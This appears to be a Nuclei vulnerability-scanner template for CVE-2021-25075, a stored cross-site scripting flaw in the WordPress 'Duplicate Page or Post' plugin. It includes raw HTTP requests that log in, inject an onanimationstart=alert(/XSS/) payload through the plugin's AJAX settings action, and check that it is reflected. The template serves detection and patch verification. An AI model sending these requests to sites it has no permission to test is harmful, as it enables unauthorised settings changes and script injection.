id: CVE-2021-25075 info: name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting author: DhiyaneshDK severity: low description: | WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery. remediation: Fixed in version 1.5.1. reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - https://nvd.nist.gov/vuln/detail/CVE-2021-25075 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N cvss-score: 3.5 cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00071 epss-percentile: 0.29434 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 vendor: wpdevart product: duplicate_page_or_post framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p - | GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - "toplevel_page_wpda_duplicate_post_menu" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210093bcf1efbc28bef15b6ce0f76664974a3281139e0c884c3e3a1f93656036b340022100ff78df928474bad3fec9c2c56d5e2527cac5a39d56f026f52ab9917179e71ba9:922c64590222798bb761d5b6d8e72950